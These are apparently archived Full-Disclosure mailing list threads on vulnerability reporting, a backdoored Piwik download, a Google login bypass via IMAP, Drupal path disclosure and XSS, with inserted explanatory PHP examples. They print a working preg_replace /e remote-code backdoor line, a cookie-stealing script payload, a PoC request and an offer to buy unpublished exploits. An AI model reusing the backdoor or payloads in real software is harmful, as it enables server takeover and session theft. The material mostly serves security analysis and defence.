Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250,000

Yeah, this is why most banks suck: they won't let me try to break in, even if I have my money there and am only doing it to make sure that it is secure. I promise I wouldn't touch anything else.

On Tue, Jan 22, 2013 at 3:08 AM, Sanguinarious Rose sanguiner...@occultusterra.com wrote:

And that is the reason why no one wants to report anything they find: it's because of people like you and your kind of thinking.

Did they publicly post all the private information? No
Did they try to use it for malicious or illicit purposes? No
Did they report it when they found it? Yes

A horrible moral compass indeed! Arrest these people for being concerned and reporting it after stumbling upon security flaws! Amiright?

On Mon, Jan 21, 2013 at 8:06 PM, Nick FitzGerald n...@virus-l.demon.co.uk wrote:

Jeffrey Walton wrote:

On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote:

Moreover, he ran it again after reporting it to see if it was still there. Essentially he's doing an unauthorised pen test having alerted them that he'd done one already.

If his personal information is in the proprietary system, I believe he has every right to very the security of the system.

BUT how can he verify (I assume that was the word you meant?) proper security of _his_ personal details?

He would have to test using someone _else's_ access credentials. That is unauthorized access by most relevant legislation in most jurisdictions.

Alternately, he could try accessing someone else's data from his login, and that is equally clearly unauthorized access.

He and his colleague who originally discovered the flaw may have used each other's access credentials to access their own data, or used their own credentials to access the other's data _in agreement between themselves_, BUT in so doing most likely broke the terms of service of the system/their school/etc., _equally_ putting them afoul of most unauthorized access legislation.

Is he allowed to opt out of the system (probably not)? If not, he has a responsibility to check.

BUT he has no responsibility to check on anyone _else's_ data and no _authority_ to use anyone else's credentials to check on his own.

So, what responsibility does he really have? It sounds like he should have left well alone once he had reported this to the university and the vendors. That he did not have the sense or moral compass to recognize that tells us something important about him.

Regards,

Nick FitzGerald

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive

On a related note: the /e modifier will be deprecated in PHP 5.5 and hopefully removed in the following version: https://wiki.php.net/rfc/remove_preg_replace_eval_modifier

On Tue, Nov 27, 2012 at 1:23 PM, Max Grobecker m...@grobecker-wtal.de wrote:

Yep, found later that the /e modifier allows you to execute code ;-)

On 27.11.2012 12:54, Christian Sciberras wrote:

At the moment I'm trying to figure out the further sense of this code, but it seems that there might also be some kind of backdoor (because of the use of $_GET).

    preg_replace("/(.+)/e", $_GET['g'], 'dwm');

You think?

Chris.

On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker m...@grobecker-wtal.de wrote:

    preg_replace("/(.+)/e", $_GET['g'], 'dwm');

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
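As an added illustration (not Piwik code and not code from anyone in this thread, apart from the one-line preg_replace() call quoted above), the script below shows why that line is a remote code execution backdoor, what the /e modifier does with a harmless replacement, the preg_replace_callback() form that does the same work without evaluating data as code, and a small audit helper for finding /e usage in a download archive. The function names and the sample source fed to the audit helper are constructed for this example.

```php
<?php
// Added example, not Piwik code. The one line quoted from the infected archive
// is reproduced as-is; everything else (function names, sample source) is
// constructed for this illustration.

// With the /e modifier, preg_replace() eval()s the *replacement* argument as
// PHP code, once per match, after substituting \1, \2, ... with the captured
// groups. When the replacement is taken from the query string, any request
// such as ?g=phpinfo() or ?g=system('id') runs that expression on the server.
function backdoor_from_thread()
{
    // The line found in the archive. Do not deploy.
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');
}

// The same mechanism with a harmless replacement: '(.+)' matches 'dwm', the
// replacement "strtoupper('\1')" becomes strtoupper('dwm') and is evaluated,
// so the result is the uppercased match. /e was deprecated in PHP 5.5 and
// removed in PHP 7.0, where preg_replace() rejects the pattern and returns NULL.
function eval_modifier_demo()
{
    if (PHP_VERSION_ID >= 70000) {
        return null;
    }
    return preg_replace("/(.+)/e", "strtoupper('\\1')", 'dwm');
}

// The replacement for /e: a callback receives the match as data and never
// evaluates it, so nothing in the subject or the replacement can become code.
function safe_replace($subject)
{
    return preg_replace_callback(
        '/(.+)/',
        function ($m) { return strtoupper($m[1]); },
        $subject
    );
}

// Audit helper: list every preg_replace() call whose pattern carries the /e
// flag. A hit whose replacement comes from $_GET/$_POST/$_COOKIE/$_REQUEST is
// an injectable backdoor; any other hit is still eval() by another name.
function find_eval_modifier($php_source)
{
    $hits = array();
    // (['"])         quote around the pattern literal
    // (.)            the regex delimiter (usually / # ~ |)
    // (.*?)\2        the pattern body up to the closing delimiter
    // ([a-zA-Z]*)\1  the modifier letters, then the closing quote
    $re = '/preg_replace\s*\(\s*([\'"])(.)(.*?)\2([a-zA-Z]*)\1/s';
    if (preg_match_all($re, $php_source, $matches, PREG_SET_ORDER)) {
        foreach ($matches as $m) {
            if (strpos($m[4], 'e') !== false) {
                $hits[] = trim($m[0]);
            }
        }
    }
    return $hits;
}

// Constructed sample of an archive file to audit: one backdoor, one clean call.
$sample = <<<'SRC'
<?php
$x = preg_replace("/(.+)/e", $_GET['g'], 'dwm');
$y = preg_replace('/foo/i', 'bar', $s);
SRC;

foreach (find_eval_modifier($sample) as $hit) {
    echo "eval modifier: $hit\n";
}
echo safe_replace('dwm'), "\n";
```

Running the script lists only the first preg_replace() from the constructed sample as a hit and prints the callback-based result. The audit regex is deliberately loose (it assumes a single-character delimiter and a string literal pattern); for a real archive, grep for the /e flag across every file and treat any hit whose replacement is not a constant string as code execution.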
Re: [Full-disclosure] OT: OSX-PHP Dev Environment

I would strongly suggest trying out http://www.jetbrains.com/phpstorm/

On Wed, Aug 1, 2012 at 9:18 PM, Thor t...@hammerofgod.com wrote:

Thanks - appreciated.

t

On Aug 1, 2012, at 12:06 PM, Ulisses Montenegro wrote:

I'm not a big fan of IDEs for dynamically typed languages, but if I had to choose one I'd go with Komodo: http://www.activestate.com/komodo-ide/features

It's multiplatform (don't know how licenses work when using it across platforms), reasonably fast and offers lots of extra goodies aside from the editing/code browsing functionality. They offer a free (as in beer) version called Komodo Edit which lacks most of the best features of the commercial edition, but I guess you could check it to see if the interface suits you.

Ulisses

On Wed, Aug 1, 2012 at 11:58 AM, Thor t...@hammerofgod.com wrote:

Greets all. Sorry for the OT, but I thought I'd ask here...

As you can guess, I've used Visual Studio to do web and application development for longer than I care to remember. Given that I've moved my production HoG facilities over to OSX, I now find myself missing the development environment VS afforded me as I migrate to PHP under Apache. I'm using EditRocket atm, but I'm soliciting recommendations for a PHP dev environment that will provide the same functions (or close) as VS does in regard to syntax checking, code completion, etc. I'm actually surprised at how quickly I've synched up with PHP, but I'd still like a more professional environment. Free or commercial doesn't matter.

I am thanking you.

t

-- 
"If debugging is the process of removing software bugs, then programming must be the process of putting them in." - Edsger Dijkstra

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] About IBM

Did you use the MustLive handle in your reports? Maybe they have some kind of mail filtering in place...

On Sun, May 27, 2012 at 10:51 PM, MustLive mustl...@websecurity.com.ua wrote:

Hello guys!

I have a question for you about IBM. Has anybody successfully contacted them, such that they officially answered and fixed vulnerabilities in their software, since Leandro Meiners (since 2005)?

When I informed them many times in 2006-2008 about multiple vulnerabilities on multiple web sites of IBM and IBM ISS, they just ignored them and did not fix them, or some of them they first ignored and later silently fixed. But those were their sites, and I was hoping that for their software products they would behave differently.

But when last week, during 16.05-20.05, I sent five advisories to IBM about multiple vulnerabilities which I found (in May, during a pentest) in IBM Lotus Notes and Domino and IBM Lotus Notes Traveler, they just ignored them. So they demonstrated the same behavior as with their web sites. And there are a lot of Cross-Site Scripting, Information Leakage, Brute Force, Insufficient Authentication, Cross-Site Request Forgery, Redirector and HTTP Response Splitting vulnerabilities in their software, which I informed them about, and which can be used for full compromise of the server and the network of those who use IBM's software (as was done during my pentest).

After the fourth e-mail to the IBM security department, when there were still no answers from them, I resent the fourth letter to their support (hoping that they would be more serious). The support answered the next day, very funny, not as lame as Cisco answered me in 2008 about vulnerabilities on their sites (which I consider the lamest vendor response, much more so than those nominees for the Pwnie Awards), but still not serious enough. The letter was a standard one: that they are in receipt of my e-mail reporting and apologize for any inconvenience I may have experienced.

When I drew support's attention to the fact that I had already written five letters to their security department (and just one to support) about multiple vulnerabilities in their software products and had not received any answer from them, and that I had no issues with working with their software (as he tried to state in his letter), I received another letter from another IBM employee, who wrote the same standard phrases and added that to report issues with software I can call them by phone :-). And now, a week after that, there is still no answer from them (as was predictable since 16.05).

This is how IBM cares about the security of their software, particularly Lotus Notes and Domino and Lotus Notes Traveler.

Best wishes and regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Google Accounts Security Vulnerability

Is it me, or are you not reading the mails that you are replying to?

On Sat, May 19, 2012 at 7:28 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

I tried, and it didn't work (couldn't repro).

None of this matters - if you have username and password, you can check mail via POP3 or IMAP. Last time I checked, that was "by design." If anyone is saying this is some sort of vulnerability because someone "happens across your username and password" then they are in the wrong business.

Michael - for you to make these claims, get Google involved, and post their replies here but refuse to give them your username (which will be on every email you send out) so they can troubleshoot is really a waste of time.

Your initial point of "even the big companies with teams of security experts have security vulnerabilities" seems to shrink a bit when they illustrate concern with the issue yet you refuse to provide the simplest of information. I'm not sure what other expectations one would have of an organization.

Timothy "Thor" Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible: http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Dan Kaminsky
Sent: Friday, May 18, 2012 1:03 PM
To: Michael Gray
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability

Surely you can create a sock puppet for debugging purposes.

On Thu, May 17, 2012 at 11:43 AM, Michael Gray mg...@emitcode.com wrote:

I'm not interested in providing that information. You can reproduce it without knowing my user name.

On May 17, 2012 8:45 AM, Mike Hearn he...@google.com wrote:

If you provide the name of the account you're logging in to, we can go take a look at what's happening.

On Thu, May 17, 2012 at 5:29 PM, Michael Gray mg...@emitcode.com wrote:

Regardless of how you say it works, I can bypass it every time it would seem. Again, by using the method in my original post. It's likely you have a bug if this isn't the functionality you're after. I appreciate the statistics but they mean little to me. Thank you for taking the time to respond. I hope my suggestions and findings will assist you in correcting these issues.

On May 17, 2012 5:51 AM, Mike Hearn he...@google.com wrote:

I understand your concerns, however they are not valid. You can be assured of the following:

1) We do not see this system as a replacement for passwords. If we block a login the user is notified and asked if it was them; if it wasn't, we ask them to pick a new password. In very high confidence cases we will immediately force the user to choose a new password, because passwords are still the first line of defense.

2) We do not see this system as a replacement for 2-factor authentication. However the reality is that the vast majority of our users do not use 2-factor authentication and this is unlikely to change any time soon. 2SV imposes a significant extra burden on the user such that despite heavy promotion many users refuse to sign up, and of those that do, many choose to unenroll shortly afterwards. Therefore we also provide this always-on best effort system as well.

3) In fact it is very effective at stopping the large, botnet driven types of attacks we see on a daily basis and so saying it doesn't add any security is wrong. Since going live the system has successfully defended tens of millions of users who have a compromised password.

A single unrepresentative data point based on one account isn't enough for you to judge the utility of the system, whereas we can clearly see the stopped campaigns (and drop in number of attempts).

That said, if you have friends and relatives who use Google and you'd like to make them more secure, by all means encourage them to set up two-factor authentication.

-- 
Mike Hearn | Senior Software Engineer | he...@google.com | Account security team

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Google Accounts Security Vulnerability

"From there, I attempted to log-in to my Google account with the same username and password. To my surprise, I was not presented with any questions to confirm my identity."

I haven't verified it, but from the report it seems that those additional verification steps can be bypassed if you first log in with the credentials via IMAP. I would guess that the successful login on IMAP adds the new IP address to the trusted IP list, hence the web login will skip the additional verification.

On Tue, May 15, 2012 at 7:57 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

I'm not sure I understand the issue here - the requirement for someone happening to come across your username and password is a pretext. Logging on to the web interface where you can change password and other personal information as well as verify existing site cookies affords the service the ability to check these sorts of things. But you logged on via IMAP, which is its own service just like POP3 or SMTP. These services can't check where you are or for the existence of a cookie, so I'm not really sure what your expectation is, or why this is being presented as an issue. Am I missing something?

Timothy "Thor" Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Jason Hellenthal
Sent: Saturday, May 12, 2012 9:32 AM
To: Michael J. Gray
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability

LMFAO!

On Sat, May 12, 2012 at 04:22:30AM -0700, Michael J. Gray wrote:

Effective since May 1, 2012.
Products Affected: All Google account based services

Upon attempting to log in to my Google account while away from home, I was presented with a message that required me to confirm various details about my account in order to ensure I was a legitimate user and not just someone who came across my username and password. Unable to remember what my phone number from 2004 was, I looked for a way around it.

The questions presented to me were:
Complete the email address: a**g...@gmail.com
Complete the phone number: (425) 4**-***7

Since this was presented to me, I was certain I had my username and password correct. From there, I simply went to check my email via IMAP at the new location. I was immediately granted access to my email inboxes with no trouble. From there, I attempted to log in to my Google account with the same username and password. To my surprise, I was not presented with any questions to confirm my identity.

This completes the steps required to bypass this account hijacking counter-measure.

This just goes to show that even the largest corporations that employ teams of security experts can also overlook very simple issues.

-- 
- (2^(N-1))

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Google Accounts Security Vulnerability

I don't know much about the verification mentioned here, but Google/Gmail has a 2-step verification, which solves the problem a little bit better IMO. When you try to log in from a new computer you will be prompted for a code which is sent via SMS to your phone. And that is the only place where you can log in with your Google user+pass; every other application requires an application-specific password, which can only be generated after you successfully log in to the web interface (with an exception: I remember that trying to add my Google account to my Android phone triggered an application-specific password to be sent via SMS).

So if 2-step verification is turned on, you won't compromise your account instantly; the attacker has to have access either to your phone, or to a device which is already on your trusted device list.

http://support.google.com/a/bin/answer.py?hl=en&answer=175197

On Tue, May 15, 2012 at 9:32 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

Logging on to IMAP mail as one would be doing hundreds of times per day is not going to reset the web cookie. If that is what the OP is reporting, I would have to question if his recollection is correct since, by that logic, the password reset feature would never be activated since any other IMAP logon would clear it.

If the user logged in, and was presented with the questions as stated, then it probably cleared any requirement since he would have to accept that. Unless he is saying that when presented with the questions he purposefully did not put them in and tried to log on to IMAP, which I find odd.

Regardless, if you already know the username and password for the email, it doesn't matter anyway, now does it? You could always get the mail via IMAP or POP or whatever options were configured in Gmail. There wouldn't be any need to go to the web interface in the first place.

Now that I know I'm not missing anything, I'll just let this one die on the vine.

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
[Full-disclosure] Fwd: Vulnerability research and exploit writing

Hi,

Anybody else got this message? I think they are spamming the subscribers/regular participants of the list.

---------- Forwarded message ----------
From: steve ruskin ruskin.st...@gmail.com
Date: Tue, Apr 24, 2012 at 9:56 AM
Subject: Vulnerability research and exploit writing
To: tyr...@gmail.com

Hi,

Trust all is well. I saw your experience in the field of vulnerability and exploit research and we have a scheme in our company to collaborate with researchers all over the world where we pay them for research done by them. Our interest is exploits which run on Windows 7, Snow Leopard with applications such as MS Office, Adobe, Browsers, Media Player, Notepad etc. along with native OS exploits as well as iPhone, BlackBerry exploits. These exploits should be unpublished though the vulnerability may be public. We also have requirements to help us do ASLR and DEP bypass for exploits researched by us.

Once you let us know about your skills and ideas we can provide you with our empanelment form via which you can register. We will look forward to your prompt response.

Warm Regards,
Steve Ruskin

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Earth to Facebook

https://www.facebook.com/whitehat/report/ ?

On Thu, Mar 15, 2012 at 4:37 PM, J. Oquendo s...@infiltrated.net wrote:

Earth calling Facebook security engineers, earth calling Facebook security engineers. Tried reaching out to you guys about a vulnerability a good friend discovered. No one should have to hunt you guys down in an effort to assist you with security flaws.

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

"It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently." - Warren Buffett

42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] [iputils] Integer overflow in iputils ping/ping6 tools

Technically he never stated that ping keeps the elevated privileges, just that the binary itself is setuid root, which is correct.

On Wed, Mar 14, 2012 at 5:40 AM, Frankie Cutlass frankiecutlas...@gmail.com wrote:

Incorrect. Ping is setuid root but it drops privs before reaching this code path. Even if you could exploit that for root (you can't) all you would end up with is a shell as your uid and a raw socket..

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Drupal 7.x Search Module - Full Path Disclosure

On Wed, Mar 14, 2012 at 2:39 PM, Ursu Mihail mishka.u...@yahoo.com wrote:

Drupal 7.x Search Module - Full Path Disclosure

== Summary
Full path disclosure due to insufficient input validation in the search module.

== Description
Performing a search with the keys parameter set as an array, an error message shows the full path of the Drupal installation, leading to possible further attacks. For the error messages to be displayed, php.ini's display_errors must be On.

Authentication: Not Needed

== Mitigation
Correct input validation for the keys parameter

== Exploit PoC
example.com/?q=search&keys[]=securitate.md

== Affected Versions
Versions 7 - 7.12 are affected. Not tested on 6.

== Credits
Ursu Mihail [ http://securitate.md ]

== Disclosure Timeline
Reported to vendor on 1 Mar 2012.
Response from vendor: "Disclosure of the path is not considered a security risk. Drupal has a configuration setting which allows PHP warnings to be printed to the screen for debugging purposes... For production websites, it is a good idea to turn this off, and the messages will not be displayed."

== Comments
Unfortunately for them, many sites display errors in production.
==

Btw, that's a pretty common problem. I also reported a similar issue a while back about https://dev.twitter.com/search/apachesolr_search/api?page[]=123 - it seems that the apachesolr_search Drupal module is also vulnerable. :/
http://code.google.com/p/twitter-api/issues/detail?id=2271

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
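An added example, not Drupal's own code, of the mechanism behind this class of report: PHP turns a "name[]=value" query parameter into an array, and a handler that assumes a string then trips a warning (or, on PHP 8, a TypeError) whose message contains the absolute path of the script. The script below shows the vulnerable and the validated handler side by side, builds the request the way the PoC does, and captures the message the browser would see with display_errors=On. The function names and the request strings are constructed for this illustration.

```php
<?php
// Added example, not Drupal code. Function names and the request strings below
// are constructed for this illustration.

// PHP parses "keys[]=x" into an array, so $_GET['keys'] is array('x'), not a
// string. A handler that passes it straight to a string function triggers a
// warning (PHP 5/7) or a TypeError (PHP 8) whose message names the absolute
// path of the file. With display_errors=On that message goes to the browser.

// Constructed stand-in for a handler that assumes keys is a string.
function search_vulnerable(array $get)
{
    return trim($get['keys']);
}

// Hardened: validate the type before using the value; arrays and missing
// parameters are rejected instead of reaching a string function.
function search_hardened(array $get)
{
    if (!isset($get['keys']) || !is_string($get['keys'])) {
        return null;
    }
    return trim($get['keys']);
}

// Build the $_GET array a web server would hand to PHP for a query string.
function query_to_get($query)
{
    parse_str($query, $result);   // "keys[]=..." becomes array('keys' => array(...))
    return $result;
}

// Capture the text a browser would receive with display_errors=On for the
// PoC-style request, without letting PHP print it itself.
function leaked_message()
{
    $captured = '';
    set_error_handler(function ($errno, $errstr, $errfile, $errline) use (&$captured) {
        $captured = "$errstr in $errfile on line $errline";
        return true;   // swallow the warning; we only want its text
    });
    try {
        search_vulnerable(query_to_get('keys[]=securitate.md'));
    } catch (TypeError $e) {   // PHP 8 turns the warning into a TypeError
        $captured = $e->getMessage() . ' in ' . $e->getFile() . ' on line ' . $e->getLine();
    }
    restore_error_handler();
    return $captured;
}

// The captured string contains __FILE__ of this script, i.e. its full path on disk.
echo leaked_message(), "\n";
var_dump(search_hardened(query_to_get('keys[]=securitate.md')));
var_dump(search_hardened(query_to_get('keys=securitate.md')));
```

The first line of output is the path-bearing message; the hardened handler yields null for the array form of the request and the search term for the normal form. Input validation is the application-side fix; display_errors=Off (with log_errors=On) in php.ini is the deployment-side one the vendor response refers to, and a production site needs both, since the next unvalidated parameter will produce the same leak.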
Re: [Full-disclosure] Full disclosure is arrest of Sabu

2011/7/25 Laurelai Storm laure...@oneechan.org

Oh and I'm not a part of lulzsec, FYI sabu tweeted 2 minutes ago wtf are you on about sir?

Maybe we could resurrect this thread. :)
Re: [Full-disclosure] Best DoS Tool

On Mon, Feb 27, 2012 at 4:35 AM, Manuel Moreno insecurech...@gmail.com wrote:

Hi List!!

I did some research about DoS tools for my regular pentesting. What is considered the best tool for DoS? I did some tests with scapy with good results.

Wouldn't the purpose of your research be to answer that question?

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] pidgin OTR information leakage

On Mon, Feb 27, 2012 at 10:27 PM, Jeffrey Walton noloa...@gmail.com wrote:

On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri rati...@mit.edu wrote:

On Feb 27, 2012, at 2:37 PM, Michele Orru wrote:

I think you didn't understand the content of the advisory. If there are 10 non-root users on an Ubuntu machine for example, and user 1 is using pidgin with OTR compiled with DBUS, then users 2 to 10 can see user 1's pidgin conversation.

This is not what the OP or CVE describe:

"plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account."

Which I read as: if I compromise user1's account then I can snoop user1's DBUS sessions. It says nothing about me being able to snoop user2's sessions. The leading phrase about attackers gaining user-level access implies that legitimate users on a system are not a relevant issue.

I tend to agree with you, and question if that is in fact true (it may well be, my apologies in advance). DBUS is on my list of things to probe, prod, and attack due to data sharing. But I'd be really surprised if data was available across distinct user sessions. Unix/Linux are usually very good at separating processes and sessions so that data does not commingle.

Jeff

From the advisory's exploitation notes:

"For the purpose of explaining the exploitation impact of this bug we will focus on a popular libpurple-based application, Pidgin. To snoop in on a Pidgin user's conversation a remote attacker would need to connect to the DBUS daemon that is responsible for the user's session. There are at least two ways to achieve this. The first one is to exploit an application that runs within the same desktop session as Pidgin. This application would have inherited the necessary DBUS_SESSION_BUS_ADDRESS environment variable and will thus be able to connect to the DBUS daemon over a unix socket without a problem. The second way is to compromise the user's account in some way and steal the DBUS_SESSION_BUS_ADDRESS value. There are multiple ways of acquiring the value for this variable, one of them being through /proc/pid/environ (which is accessible to processes of the same owner), and another being through a file in ~/.dbus/session-bus/. Using this value, the attacker will now be able to connect to DBUS with applications that are not part of the desktop session. Please note that the above methods do not require any control over the Pidgin process (ptrace or other)."

So you either need to be able to dump the environment variable from a process run by the victim, or read files which AFAIK only the victim (and root ofc) has access to. Did I miss anything?

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Vulnerability-lab.com XSS

On Fri, Feb 3, 2012 at 4:21 PM, Luis Santana hackt...@hacktalk.net wrote:

Earlier today I tried to contact the people over at http://vulnerability-lab.com about an XSS vulnerability I found on their site (ironic) but it appears they want nothing to do with me. Praise Full-Disclosure.

[image: Vulnerability-lab.com XSS - HackTalk Security] http://i.imgur.com/CripA.jpg

The Irony Of A Site For Disclosing Sites Being Itself Vuln To Something So Trivial

Basically I tried to report this issue to them through a private message on YouTube and then a follow request on Twitter (so I could DM them) but to no avail. Eventually rem0ve joined freenode and messaged me and told me he didn't want to be cooperative with me or even be friendly. Sometimes being a prick just makes you look like an idiot.

Judging from the screenshot, it seems to be a reflected XSS through the User-Agent field. I would be curious how this could be exploited from the client side, as you can't manipulate other visitors' User-Agent header. Of course, if the User-Agent is logged and the admin area which displays the logs has the same defect, then this is a different story.

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
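An added example, not vulnerability-lab.com's code, of the two situations in the reply above: a User-Agent header reflected back to the request that sent it (which only the attacker sees), and the same header written to an access log that an admin page later renders, where it reaches another user's browser. Each is shown unescaped and with output encoding applied. The header value, the log line, and the function names are constructed for this illustration.

```php
<?php
// Added example, not vulnerability-lab.com code. The header value, log line
// and function names are constructed for this illustration.

// A User-Agent an attacker can send with their own request. Only the sender
// sees it reflected, which is why reflected UA XSS on its own is self-XSS.
function attacker_user_agent()
{
    return 'Mozilla/5.0 <script>alert(document.cookie)</script>';
}

// Reflected, unescaped: the header lands in the page as markup.
function render_ua_vulnerable($ua)
{
    return "<p>Your browser: $ua</p>";
}

// Fixed: encode at the point of output, for an HTML text context.
function html($s)
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_ua_safe($ua)
{
    return '<p>Your browser: ' . html($ua) . '</p>';
}

// Second scenario: the header is written to the access log and an admin page
// renders the log. Now the victim is whoever views the log, so the same
// header becomes stored XSS. Constructed line in Apache "combined" format;
// the User-Agent is the last quoted field.
function sample_log_line()
{
    return '203.0.113.5 - - [03/Feb/2012:16:21:00 +0000] "GET / HTTP/1.1" 200 512 "-" "'
         . attacker_user_agent() . '"';
}

function parse_combined_log($line)
{
    // ip ident user [time] "request" status bytes "referer" "user-agent"
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "(.*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return array('ip' => $m[1], 'time' => $m[2], 'request' => $m[3],
                 'status' => (int) $m[4], 'ua' => $m[7]);
}

function admin_row_vulnerable($line)
{
    $e = parse_combined_log($line);
    return "<tr><td>{$e['ip']}</td><td>{$e['ua']}</td></tr>";
}

function admin_row_safe($line)
{
    $e = parse_combined_log($line);
    return '<tr><td>' . html($e['ip']) . '</td><td>' . html($e['ua']) . '</td></tr>';
}

// Crude check: is a raw <script> tag still present in the produced HTML?
// (A real output-encoding review uses an HTML parser, not a substring match.)
function contains_raw_script($html)
{
    return stripos($html, '<script') !== false;
}

$cases = array(
    'reflected'               => render_ua_vulnerable(attacker_user_agent()),
    'reflected, escaped'      => render_ua_safe(attacker_user_agent()),
    'admin log view'          => admin_row_vulnerable(sample_log_line()),
    'admin log view, escaped' => admin_row_safe(sample_log_line()),
);
foreach ($cases as $label => $out) {
    printf("%-26s %s\n", $label, contains_raw_script($out) ? 'script tag present' : 'encoded');
}
```

The reflected case is worth fixing for hygiene, but the log-view case is the one that turns a self-XSS into an attack on the administrator: the attacker only needs to send one request with a crafted header and wait. Encoding on output in every view that shows request-derived data (logs, analytics, error pages) closes both.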
Re: [Full-disclosure] when did piracy/theft become expression of freedom

On Sun, Jan 29, 2012 at 10:53 AM, Charles Morris cmor...@cs.odu.edu wrote:

Dear Valdis and whoever else;

The really ridiculous points are the following:

A) Every time you execute/install/download a program you are committing evil data theft by not only copying secret or illegal information into RAM/Disk/Registers/Buffers/Busses/photons coming off the screen/human memory/history of the universe, but potentially not just on your physical property but on hundreds of routers and deduplication boxen around the earth.

Which is allowed to you by the copyright holders.

B) You can't copyright or own a number; all digital representations are numbers, due to the boolean nature (no fuzzy data), etc.

Sadly, one can: http://en.wikipedia.org/wiki/Illegal_prime

C) Any data is a form of any other data given a specific transform, e.g. manifold / encryption key + algo, something as trivial as XOR

And?

D) You guys already know these points so why do we even care anymore about what these people say? Why even have these conversations. They will never stop. It's about greed and shortsightedness, not about what is moral or logical. Just try to ignore them or change the subject when the parrots start talking.

You can't ignore them until the law stops supporting them.

And to preempt the flames from the blind, yes, I feel artists should be compensated for their contribution.

Agree.

-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu
Re: [Full-disclosure] when did piracy/theft become expression of freedom
On Sat, Jan 28, 2012 at 11:26 PM, valdis.kletni...@vt.edu wrote:

On Fri, 27 Jan 2012 19:02:09 PST, Zach C. said:

If you buy an album used, the seller generally loses possession of it, you gain possession of it at a reduced cost, and the original purchase still gave the original seller and producer value.

Note that if I shoplift a CD that sucks and isn't worth the $14.99 sticker price, I have deprived the producer of the ability to sell it to somebody else. That's the crucial point that underlies our social concept of theft - if I take it from you, you don't have it anymore. If I copy an album that isn't worth the sticker price, and which I would not have purchased at that price, two things of note happen:

1) As much as the labels wish it were so, they can't count that as lost revenue because it wouldn't have accrued to them anyhow, any more than a car dealership can legitimately call it lost revenue if I walk onto their lot, tell the salescritter they're crazy if they think I'll pay $28K for a given car, and walk off the lot. (Now, if they want to count the "Damn, we lost the $4.99 that guy *would* have paid if we charged that instead of $14.99", they're welcome to that. :)

2) More importantly, they still have the original bits and are free to look for other suckers who *will* pay $14.99.

the shop can supplement the stolen CD for much less than 14.99, and also manufacturing a cd costs much less. the price not only contains the material value of the given product, but it is an arbitrary number, which was calculated based on the cost of the production (and marketing, and shipping, etc.) of the product, and on the demand and pricing of that kind of product, so basically the market. the difference with digital goods is that there is no material part of the package, so it could seem that there is no theft and no loss of revenue. which could be true, if only those would pirate, who otherwise wouldn't/couldn't buy the product, which imo is not true.

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Another thing to note, if artists, software companies etc were so nice to actually want to give all this stuff for free, I'm pretty sure no one is forcing them to sell their content. So don't talk about the "they're not losing anything" bullshit to me.

Then tell me what they lost. Can you prove that someone who downloaded a song would have spent money on the song if it had not been available for download? The argument that losses are incurred for every download has always been baseless and always will be.

if you steal a bottle of milk, you can argue that it was right before the shop closing, and the warranty would have expired before they could sell it to somebody else, and demand them to prove otherwise...

